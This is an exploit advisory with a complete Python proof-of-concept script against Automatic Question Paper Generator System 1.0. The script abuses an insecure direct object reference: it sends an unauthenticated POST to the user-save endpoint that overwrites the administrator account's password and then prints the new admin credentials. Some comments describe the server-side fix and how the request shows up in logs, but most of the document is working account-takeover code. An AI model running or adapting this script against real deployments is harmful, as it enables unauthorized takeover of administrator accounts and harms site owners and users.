Automatic Question Paper Generator System version 1.0 suffers from an insecure direct object reference that allows an attacker to reset the password of other users.
233bb5192c00cb509cec2fd98ea837f5
# Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass
# Date: 2022-04-03
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
#!/usr/bin/env python3
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse
def banner():
    """Print the tool's ASCII-art banner and title lines to stdout.

    Takes no arguments and returns nothing; printing is its only effect.
    """
    print('''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/
[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
''')
def main():
    """Send the single profile-save request that demonstrates the IDOR.

    Takes no parameters: the target base URL and the replacement password are
    read from the module-level ``arguments`` namespace that the ``__main__``
    block populates, so this function cannot be called before that block runs.
    The request is a multipart POST to ``classes/Users.php?f=save`` carrying a
    client-chosen ``id`` field and no session cookie; success is reported when
    the response text contains ``'1'``, otherwise "Not vulnerable" is printed.
    Returns nothing.
    """
    # The record to overwrite is selected solely by this client-supplied id,
    # and the request below carries no session cookie or other credential.
    # That is the defect the PoC exercises: the server-side fix is to require
    # an authenticated session on this endpoint and to take the target account
    # from that session rather than from the posted id.
    fields = {
        'id': "1",
        'firstname': 'Adminstrator',
        'lastname': 'Admin',
        'username': 'admin',
        'password': arguments.newpassword
    }
    # Browser-style multipart boundary; the random suffix only keeps the
    # boundary from colliding with the encoded field values.
    boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
    m = MultipartEncoder(fields=fields, boundary=boundary)
    headers = {
        "Connection": "keep-alive",
        "Content-Type": m.content_type
    }
    # For defenders: an unauthenticated POST to this path is the event to look
    # for in web-server or application logs.
    r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m)
    # NOTE(review): a bare substring test — any response body containing the
    # character '1' is treated as success, so this signal is only indicative.
    if '1' in r.text:
        print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}')
    else:
        print('[-] Not vulnerable')
if __name__ == '__main__':
    # Command-line entry point: both options are mandatory. The parsed
    # namespace is bound to the module-level name ``arguments`` because
    # main() reads it as a global rather than taking parameters.
    cli = argparse.ArgumentParser()
    cli.add_argument(
        '-u', '--url',
        dest='url',
        required=True,
        action='store',
        help='Target URL (http://target.com/aqpg/)',
    )
    cli.add_argument(
        '-p', '--password',
        dest='newpassword',
        required=True,
        action='store',
        help='New password',
    )
    arguments = cli.parse_args()
    banner()
    sleep(2)
    main()